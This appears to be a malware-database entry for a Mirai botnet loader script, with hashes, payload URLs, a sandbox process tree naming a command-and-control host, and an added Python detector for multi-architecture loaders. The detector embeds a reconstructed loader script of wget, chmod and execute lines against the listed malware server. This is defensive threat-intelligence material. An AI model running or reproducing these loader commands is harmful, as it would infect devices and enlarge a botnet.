MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 0cff3d53bc4c2b36478f401d8ea437eb990f2818f9dd20cb116f894bdf0f18ff. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat: unknown
Vendor detections: 5

SHA256 hash: 0cff3d53bc4c2b36478f401d8ea437eb990f2818f9dd20cb116f894bdf0f18ff
SHA3-384 hash: 025eeb0703a82203aa8cd5ba8ec8e999be51bbadba8fccbf3c0af5acdb8b7b64b096ad5e11fecc951793ff3db790f94a
SHA1 hash: 5facbf0d4bd0a8bd7c8fd4a7b3a4002d9de5daf5
MD5 hash: 9e57e9d3415565f1ce390c95c4e47845
humanhash: kentucky-india-jersey-minnesota
File name: w.sh
File size: 1,172 bytes
First seen: 2026-05-14 02:49:07 UTC
Last seen: 2026-05-14 14:04:47 UTC
File type: sh
MIME type: text/plain
ssdeep: 12:y75bA1MftNIOWAerKgHgKAlN3Q3qgNrX47OrcALyuAzA+90Ln:W5bhNIvKsJpI7sm9In
TLSH: T14121F5D802A1BE99C989CD04706E87446184C6D334E4EBD89CBD58BF6B85E10F16DFAF
Magika: txt
Reporter: abuse_ch
Tags: sh
URL                                  Malware sample (SHA256 hash)                                      Signature  Tags
http://156.238.242.196/manji.arm4    02f4cc2631d467285e7da67c1cc6a94f5719bce4e26ce26ff8605ad37697abbe  Mirai      arm elf mirai opendir ua-wget
http://156.238.242.196/manji.arm5    c217d74d21449bed31d7a882a830b0b35ca7e1c9da1aa9d4d5ca1923e4401c93  Mirai      arm elf mirai opendir ua-wget
http://156.238.242.196/manji.arm6    cdf7e0346ea4f27dc3aa07e98ef4d1d87fe269bcf45022999931f84ddb0c0ece  Mirai      arm elf mirai opendir ua-wget
http://156.238.242.196/manji.arm7    5fa602bdd9f6156629e7b8ef4ac87b7c3f903a812ec63e7988fb343cfa36bc89  Mirai      arm elf mirai opendir ua-wget
http://156.238.242.196/manji.sh4     927eaae876733594f2889b37b1701a8d90ad708bf83da4dd77e967966c51873f  Mirai      elf mirai opendir SuperH ua-wget
http://156.238.242.196/manji.arc     4d10e894f61f4145fcb923f4f465058e2f8b0ec03b06be9dce9678f35d94a134  Mirai      arc elf mirai opendir ua-wget
http://156.238.242.196/manji.mips    1319fc34a179751881b02a64be28a48be30ec0aaef7100e964995d60ed478973  Mirai      elf mips mirai opendir ua-wget
http://156.238.242.196/manji.mpsl    da6b482991f7adca439cc9208321e0e05fafcf3dcfd41a299cb0b667256ac276  Mirai      elf mips mirai opendir ua-wget
http://156.238.242.196/manji.spc     019df454f6accab72dcb3c8723043e8a4ce512ef15748547d370ef89872685a0  Mirai      elf mirai opendir sparc ua-wget
http://156.238.242.196/manji.x86     298f12ed211ccb843022b76357e7daca81b4adc337bc12e4a82e093ce06b6ade  Mirai      elf mirai opendir ua-wget x86
http://156.238.242.196/manji.i686    4dfec9b7cd5d733c4873b773316e804d380f90ae5562fb7b2cc7a9304b6fabf8  Mirai      elf mirai opendir ua-wget x86
http://156.238.242.196/manji.i486    2ee7081223b0b64ae4994d8caaaa586468850287daa93b0c980b42177d37b1f8  Mirai      elf mirai opendir ua-wget x86
http://156.238.242.196/manji.apk     5fa602bdd9f6156629e7b8ef4ac87b7c3f903a812ec63e7988fb343cfa36bc89  Mirai      arm elf mirai opendir ua-wget

All thirteen payloads are served from the same open directory on 156.238.242.196 and fetched with a wget user agent. Note that manji.apk has exactly the same SHA256 as manji.arm7: the .apk name is a disguise for the same ARM ELF, not an Android package.

Intelligence

File Origin
# of uploads: 369
# of downloads: 0
Origin country: DE

Vendor Threat Intelligence

No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: busybox mirai

Status: terminated
Behavior graph (process tree reconstructed from the sandbox graph data; pids as recorded):

/usr/bin/sudo (pid 2891)
  execve -> /tmp/sample.bin (pid 2897)  [w.sh]
    execve -> /usr/bin/busybox (pid 2898), no network activity recorded
    execve -> /usr/bin/chmod, 13 times (pids 2900, 3000, 3146, 3237, 3339, 3506, 3655, 3841, 3996, 4168, 4203, 4359, 4430)
    execve -> /usr/bin/busybox [net send-data write-file], 12 times (pids 2903, 3007, 3154, 3244, 3343, 3509, 3658, 3846, 4002, 4171, 4209, 4362)
      each sends 87 or 88 bytes to 156.238.242.196:80
    clone -> /usr/bin/dash, 10 times (pids 2902, 3002, 3148, 3238, 3340, 3507, 3656, 3842, 3997, 4432)
    execve -> /home/sandbox/manji.x86 (pid 4169)
      clone -> /home/sandbox/manji.x86 (pid 4170) [dns net send-data write-file zombie]
        -> 8.8.8.8:53, send 448 bytes (DNS)
        -> cnc.504.su:56999, send 25 bytes
    execve -> /home/sandbox/manji.i686 (pid 4207)
      clone -> /home/sandbox/manji.i686 (pid 4208)
    execve -> /home/sandbox/manji.i486 (pid 4360)
      clone -> /home/sandbox/manji.i486 (pid 4361)
    execve -> /usr/bin/rm (pid 4437) [delete-file]

The repeating busybox / chmod / exec triplet matches one iteration per payload in the URL table: 13 busybox invocations (downloads), 13 chmods and 13 execution attempts. Only the three x86 builds (manji.x86, manji.i686, manji.i486) actually execute in the x86 sandbox; the ten remaining attempts leave only a forked dash child, consistent with exec failing on ELF images for other CPU architectures. manji.x86 is the only payload with outbound activity beyond the download host: a DNS lookup via 8.8.8.8 and a 25-byte send to cnc.504.su:56999, the command-and-control endpoint. The script ends by deleting the downloaded files.
Threat name: Linux.Downloader.Generic
Status: Suspicious
First seen: 2026-05-14 07:28:44 UTC
File type: Text (Shell)
AV detection: 14 of 36 (38.89%)
Threat level: 3/5

Please note that we are no longer able to provide a coverage score for VirusTotal.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Author: Anish Bogati
Description: Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference: MalwareBazaar sample lilin.sh
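The rule description above names a technique rather than a fixed string set: fetch a binary from a bare IP address, make it executable, run it, and repeat for every CPU architecture. The Python below is an added illustration, not code from MalwareBazaar or from the YARA rule's author; it implements that same logic as a static triage function and runs it over a constructed script modelled on this entry. The 13 URLs in the constructed script are the ones listed in the URL table above, but the command lines themselves are an assumption, since the page does not reproduce the body of w.sh. It also shows where a payload-name heuristic falls short: manji.apk gets no architecture from its name, which the URL table resolves because its SHA256 equals that of manji.arm7.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# CONSTRUCTED sample (not the real w.sh): the 13 URLs are those listed on the
# MalwareBazaar entry; the command lines are assumed from the sandbox process
# tree (busybox download, chmod and exec per payload, rm at the end).
SAMPLE_SCRIPT = """\
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
busybox wget http://156.238.242.196/manji.arm4; chmod 777 manji.arm4; ./manji.arm4 w.sh
busybox wget http://156.238.242.196/manji.arm5; chmod 777 manji.arm5; ./manji.arm5 w.sh
busybox wget http://156.238.242.196/manji.arm6; chmod 777 manji.arm6; ./manji.arm6 w.sh
busybox wget http://156.238.242.196/manji.arm7; chmod 777 manji.arm7; ./manji.arm7 w.sh
busybox wget http://156.238.242.196/manji.sh4; chmod 777 manji.sh4; ./manji.sh4 w.sh
busybox wget http://156.238.242.196/manji.arc; chmod 777 manji.arc; ./manji.arc w.sh
busybox wget http://156.238.242.196/manji.mips; chmod 777 manji.mips; ./manji.mips w.sh
busybox wget http://156.238.242.196/manji.mpsl; chmod 777 manji.mpsl; ./manji.mpsl w.sh
busybox wget http://156.238.242.196/manji.spc; chmod 777 manji.spc; ./manji.spc w.sh
busybox wget http://156.238.242.196/manji.x86; chmod 777 manji.x86; ./manji.x86 w.sh
busybox wget http://156.238.242.196/manji.i686; chmod 777 manji.i686; ./manji.i686 w.sh
busybox wget http://156.238.242.196/manji.i486; chmod 777 manji.i486; ./manji.i486 w.sh
busybox wget http://156.238.242.196/manji.apk; chmod 777 manji.apk; ./manji.apk w.sh
rm -rf manji.*
"""

# CONSTRUCTED benign installer: hostname-based download, one binary, must not match.
BENIGN_SCRIPT = """\
wget https://example.org/pkg/tool.tar.gz
tar xzf tool.tar.gz && chmod +x tool/install.sh && ./tool/install.sh
"""

# Download URL whose host is a bare IPv4 address (no DNS), typical of IoT loaders.
NUMERIC_IP_URL = re.compile(
    r"https?://(?P<host>(?:\d{1,3}\.){3}\d{1,3})(?::\d{1,5})?/(?P<path>[^\s;&|]+)"
)
DOWNLOADER = re.compile(r"(?:^|[\s;&|])(?:busybox\s+)?(?:wget|curl|tftp|ftpget)\b", re.M)
CHMOD = re.compile(r"\bchmod\s+(?:[augo]*\+[rwx]+|[0-7]{3,4})\s+(?P<target>[^\s;&|]+)")
EXEC_LOCAL = re.compile(r"(?:^|[\s;&|])\./(?P<target>[^\s;&|]+)", re.M)

# Payload-name suffixes used by Mirai-family loaders, mapped to CPU families.
ARCH_BY_SUFFIX = {
    "arm": "ARM", "arm4": "ARM", "arm5": "ARM", "arm6": "ARM", "arm7": "ARM",
    "sh4": "SuperH", "arc": "ARC", "mips": "MIPS", "mpsl": "MIPS", "mipsel": "MIPS",
    "spc": "SPARC", "sparc": "SPARC", "x86": "x86", "i686": "x86", "i486": "x86",
    "ppc": "PowerPC", "m68k": "m68k",
}


def arch_of(filename: str) -> Optional[str]:
    """Map a payload name such as 'manji.mpsl' or 'x86' to a CPU family, or None."""
    return ARCH_BY_SUFFIX.get(filename.rsplit(".", 1)[-1].lower())


@dataclass
class Triage:
    urls: list[str] = field(default_factory=list)
    hosts: set[str] = field(default_factory=set)
    chmod_targets: set[str] = field(default_factory=set)
    exec_targets: set[str] = field(default_factory=set)
    architectures: set[str] = field(default_factory=set)
    unknown_payloads: set[str] = field(default_factory=set)
    has_downloader: bool = False

    @property
    def payloads(self) -> set[str]:
        """Files that are both made executable and run: the staged payloads."""
        return self.chmod_targets & self.exec_targets

    @property
    def is_loader(self) -> bool:
        # The technique the YARA rule describes: download from a numeric IP,
        # chmod, execute, and do so for several CPU architectures.
        return (self.has_downloader and bool(self.urls)
                and bool(self.payloads) and len(self.architectures) >= 3)


def triage(script: str) -> Triage:
    """Static triage of a shell script for the multi-arch botnet loader pattern."""
    t = Triage()
    t.has_downloader = DOWNLOADER.search(script) is not None
    for m in NUMERIC_IP_URL.finditer(script):
        t.urls.append(m.group(0))
        t.hosts.add(m["host"])
    t.chmod_targets = {m["target"] for m in CHMOD.finditer(script)}
    t.exec_targets = {m["target"] for m in EXEC_LOCAL.finditer(script)}
    for name in t.payloads:
        arch = arch_of(name)
        if arch:
            t.architectures.add(arch)
        else:
            t.unknown_payloads.add(name)  # e.g. manji.apk: name says nothing about the CPU
    return t


if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        t = triage(text)
        print(f"{label}: loader={t.is_loader} hosts={sorted(t.hosts)} "
              f"archs={sorted(t.architectures)} unknown={sorted(t.unknown_payloads)}")
```

The verdict requires all three behaviours together plus at least three distinct architectures, so a legitimate installer that downloads one tarball from a hostname and runs a setup script does not trip it, while the constructed loader does. The `unknown_payloads` set is the hand-off to hash-based enrichment: a file that is chmodded and executed but carries no recognisable architecture suffix is exactly the case where the SHA256 recorded in the URL table tells you what it really is.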

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download
  sh  0cff3d53bc4c2b36478f401d8ea437eb990f2818f9dd20cb116f894bdf0f18ff  (this sample)

Delivery method: Distributed via web download

Comments